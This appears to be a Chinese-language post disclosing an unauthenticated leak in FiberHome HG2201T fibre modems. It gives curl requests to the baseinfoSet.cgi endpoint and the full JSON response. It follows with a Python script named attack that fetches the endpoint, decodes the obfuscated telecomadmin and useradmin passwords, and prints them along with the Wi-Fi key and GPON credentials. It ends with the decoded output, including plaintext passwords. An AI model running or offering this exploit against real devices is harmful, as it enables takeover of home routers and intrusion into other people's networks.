备份信息接口（baseinfoSet.cgi）会泄露超级管理员（telecomadmin）密码：从下面不带任何 Cookie/凭据的 curl 请求来看，该接口无需登录即可访问，返回的密码只做了简单混淆，用几行代码即可还原。
curl http://192.168.1.1:8080/cgi-bin/login.htm.cgi # 管理后台
curl http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi # 备份信息
curl http://192.168.1.1:8080/cgi-bin/baseinfo.cgi # 设备信息
返回结果
{
"RETURN": {
"success": true
},
"BASEINFOSET": {
"baseinfoSet_INTERNETMAC": "XX:XX:XX:51:7C:C0",
"baseinfoSet_TR069MAC": "XX:XX:XX:51:7c:c1",
"baseinfoSet_VOIPMAC": "XX:XX:XX:51:7c:c2",
"baseinfoSet_PRIPROTOCOLMAC": "XX:XX:XX:51:7c:c3",
"baseinfoSet_WLANMAC": "XX:XX:XX:51:7c:cd",
"baseinfoSet_PONMAC": "XX:XX:XX:51:7c:cf",
"baseinfoSet_INTERNETEN": "1",
"baseinfoSet_TR069EN": "1",
"baseinfoSet_VOIPEN": "1",
"baseinfoSet_PRIPROTOCOLEN": "1",
"baseinfoSet_PONEN": "",
"baseinfoSet_TELECOMACCOUNT": "telecomadmin",
"baseinfoSet_TELECOMPASSWORD": "120&105&112&105&103&115&113&101&104&113&109&114&49&50&50&54&51&55&49&48&",
"baseinfoSet_USERACCOUNT": "useradmin",
"baseinfoSet_USERPASSWORD": "104&116&111&107&54&56&51&53&54&56&51&53&",
"baseinfoSet_MANUFACTUREROUI": "XXXXXX",
"baseinfoSet_DEVICESERIALNUMBER": "XXXXXX-3C846XXXXXX517CC0",
"baseinfoSet_Compiletime": "23:36:36 Jan 25 2018",
"baseinfoSet_SOFTWAREVERSION": "V1.00.M5002",
"baseinfoSet_EXTNUMBER": "RP000000",
"baseinfoSet_HARDWAREVERSION": "V2.1",
"baseinfoSet_HARDWARECODE": "WKE7.200.400R1A",
"baseinfoSet_SSID": "ChinaNet-Code",
"baseinfoSet_WPAKEY": "JavaIsBest1024Code!",
"baseinfoSet_REGSTATUS": "1",
"baseinfoSet_GPONSN": "FHTT00XXXXXX",
"baseinfoSet_GPONPASSWORD": "HGXXXXXXXX",
"baseinfoSet_PONMODE": "EPON",
"baseinfoSet_BRMAC": "XX:XX:XX:51:7c:cc",
"baseinfoSet_area": "XXXXXX",
"baseinfoSet_IMAGEID": "XXXXXXXXe6ba61dfcfe37c8798850ec",
"baseinfoSet_PreconfigID": "XXXXXXX242ee60b6604d278c52cff70",
"baseinfoSet_factory": "1",
"baseinfoSet_factorymode": "0",
"wirelessenable": "1"
}
}
{
"RETURN": {
"success": true
},
"wirelessenable": "1",
"BASEINFO_PONMODE": "EPON",
"BASEINFO_DeviceType": "HG2201T",
"Portnumber": "4",
"wifi5g": "0",
"wannumber": "10",
"USERNAME": "useradmin",
"BASEINFO_area": "XXXXXX",
"BASEINFO_TYPE": "EPON",
"BASEINFO_ONUMAC": "XX:XX:XX:51:7c:cf",
"BASEINFO_informstatus": "8",
"BASEINFO_BASESTR1": "V1.00.M5002&FiberHome&HG2201T&XXXXXX&3C846XXXXXX517CC0&V2.1&88112325483&1&ChinaNet-Code&JavaIsBest1024Code!&1&WPA/WPA2&Up&NoLink&NoLink&NoLink&ChinaNet-RnqT-2&ChinaNet-RnqT-3&ChinaNet-RnqT-4",
"BASEINFO_SOFTWAREVRESION": "V1.00.M5002",
"BASEINFO_BASESTR5g": "NULL&NULL&NULL&NULL&NULL&NULL&NULL&&",
"BASEINFO_regtime": "104766.77",
"BASEINFO_phyauthstates": "1",
"BASEINFO_loidauthstates": "1",
"BASEINFO_spower": "1.61",
"BASEINFO_rpower": "-21.49",
"BASEINFO_signalstatus": "1",
"BASEINFO_MACAddress": "XX:XX:XX:0f:f6:25;&&&&",
"all_wan_str1": "2&1&PPP&1&2_INTERNET_R_VID_41&1&IP_Routed&Connected&Unconfigured&dev.eth.1,dev.eth.3,dev.eth.4,dev.wla.1&",
"all_wan_str2": "",
"all_wan_str3": "",
"all_wan_str4": "1&1&IP&1&1_TR069_R_VID_46&1&IP_Routed&Connected&Unconfigured&NULL&",
"END": "ENDSTR"
}
写个脚本解密
import requests
import json
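def decrypt(ciphertext):
    """Decode an '&'-separated password field returned by baseinfoSet.cgi.

    Each token is a decimal code point. Digits ('0'-'9', codes 48-57) are
    stored unchanged; every other character is stored as its code point + 4.
    NOTE(review): this rule was inferred from the two samples on this page
    (it reproduces "telecomadmin12263710" and "dpkg68356835"), not from the
    firmware, so characters outside the observed ranges may decode wrongly.

    Args:
        ciphertext: Raw field value such as "120&105&...&48&". Empty tokens
            (including the trailing one) and whitespace-only tokens are
            skipped.

    Returns:
        The decoded plaintext; "" for an empty or None input.

    Raises:
        ValueError: if a non-empty token is not a decimal integer.
    """
    if not ciphertext:
        return ""
    chars = []
    for token in ciphertext.split("&"):
        token = token.strip()
        if not token:
            continue
        code = int(token)
        # Only non-digit characters were shifted by the obfuscator.
        if code > 57:
            code -= 4
        chars.append(chr(code))
    return "".join(chars)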
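def attack(host, port=8080, timeout=10):
    """Fetch baseinfoSet.cgi from *host* and print the credentials it leaks.

    The request carries no session cookie or credentials; on the device
    sampled on this page the endpoint still returns the full BASEINFOSET
    object, including the obfuscated admin passwords, which are decoded
    with decrypt() before printing.

    Args:
        host: IP address or hostname of the ONT.
        port: HTTP port of the management interface (8080 on the sample).
        timeout: Seconds to wait for connect/read so a scan does not hang
            on a filtered or silent host.

    Returns:
        A dict of the extracted fields (passwords decoded) on success, or
        None if the request failed, the body was not JSON, or the response
        did not have the expected layout.
    """
    url = "http://{}:{}/cgi-bin/baseinfoSet.cgi".format(host, port)
    try:
        resp = requests.get(url, timeout=timeout)
        back_info = json.loads(resp.text)
    except (requests.RequestException, ValueError) as exc:
        # Network/timeout errors and non-JSON bodies both end up here.
        print("request failed! {}: {}".format(url, exc))
        return None

    # Validate the layout before indexing so an unexpected reply prints a
    # message instead of raising KeyError/TypeError out of the scan loop.
    ret = back_info.get("RETURN") if isinstance(back_info, dict) else None
    if not isinstance(ret, dict) or not ret.get("success"):
        print("HOST: {} - device reported failure or unexpected response".format(host))
        return None
    base_info_set = back_info.get("BASEINFOSET")
    if not isinstance(base_info_set, dict):
        print("HOST: {} - no BASEINFOSET object in response".format(host))
        return None

    result = {
        "HOST": host,
        "TELECOMACCOUNT": base_info_set.get("baseinfoSet_TELECOMACCOUNT", ""),
        "TELECOMPASSWORD": decrypt(base_info_set.get("baseinfoSet_TELECOMPASSWORD", "")),
        "USERACCOUNT": base_info_set.get("baseinfoSet_USERACCOUNT", ""),
        "USERPASSWORD": decrypt(base_info_set.get("baseinfoSet_USERPASSWORD", "")),
        "SSID": base_info_set.get("baseinfoSet_SSID", ""),
        "WPAKEY": base_info_set.get("baseinfoSet_WPAKEY", ""),
        "GPONSN": base_info_set.get("baseinfoSet_GPONSN", ""),
        "GPONPASSWORD": base_info_set.get("baseinfoSet_GPONPASSWORD", ""),
    }
    for key, value in result.items():
        print("{}: {}".format(key, value))
    return result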
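if __name__ == "__main__":
    import sys

    # Target defaults to the ONT's LAN-side address used throughout this
    # page; an alternative host may be given as the first CLI argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    attack(target)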
输出
HOST: 192.168.1.1
TELECOMACCOUNT: telecomadmin
TELECOMPASSWORD: telecomadmin12263710
USERACCOUNT: useradmin
USERPASSWORD: dpkg68356835
SSID: ChinaNet-Code
WPAKEY: JavaIsBest1024Code!
GPONSN: FHTT00244D02
GPONPASSWORD: HG26012345